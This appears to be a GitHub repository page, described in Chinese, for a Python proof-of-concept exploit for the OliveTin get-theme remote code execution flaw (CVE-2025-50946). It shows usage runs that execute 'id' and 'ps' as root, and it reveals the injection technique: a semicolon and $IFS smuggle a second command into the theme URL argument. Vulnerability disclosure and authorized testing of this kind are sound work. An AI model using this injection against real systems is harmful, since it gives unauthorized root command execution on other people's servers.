runt1me/cve-2025-50946

GitHub: runt1me/cve-2025-50946

针对 OliveTin get-theme 远程代码执行漏洞(CVE-2025-50946)的 Python 漏洞利用脚本,用于在授权测试中验证该漏洞的可利用性。

Stars: 0 | Forks: 0

# cve-2025-50946 CVE-2025-50946(OliveTin get-theme RCE)的漏洞利用脚本。其对字符的要求非常苛刻,许多包含多个参数的命令可能无法正确执行。我还没花时间去深究根本原因或尝试让脚本变得更健壮。如果你有需求,请随时联系我或提交一个 PR。 感谢 [chrisWalker11](https://github.com/chrisWalker11) 提供了我编写此脚本所依据的原始研究:[链接](https://github.com/chrisWalker11/Cves/blob/main/CVE-2025-50946/CVE-2025-50946.md) # 示例用法 基础 PoC: ``` python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id" [*] Target: http://192.168.141.194:1337 [*] Payload: id [*] Sending payload... uid=0(root) gid=0(root) groups=0(root) ``` 进程列表(仅展示部分输出): ```  python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "ps -efH" [*] Target: http://192.168.141.194:1337 [*] Payload: ps$IFS-efH [*] Sending payload... UID PID PPID C STIME TTY TIME CMD root 2 0 0 09:20 ? 00:00:00 [kthreadd] root 1 0 0 09:20 ? 00:00:01 /sbin/init root 313 1 0 09:20 ? 00:00:00 /usr/lib/systemd/systemd-journald root 738 1 0 09:20 ? 00:00:00 /usr/sbin/cron -f -P root 749 1 0 09:20 ? 00:00:00 /usr/local/bin/OliveTin root 2167 749 0 13:26 ? 00:00:00 sh -c olivetin-get-theme http://t;ps$IFS-efH root 2168 2167 0 13:26 ? 00:00:00 ps -efH ```
标签:Go语言工具, PoC, Python, 威胁模拟, 无后门, 暴力破解, 远程命令执行, 逆向工具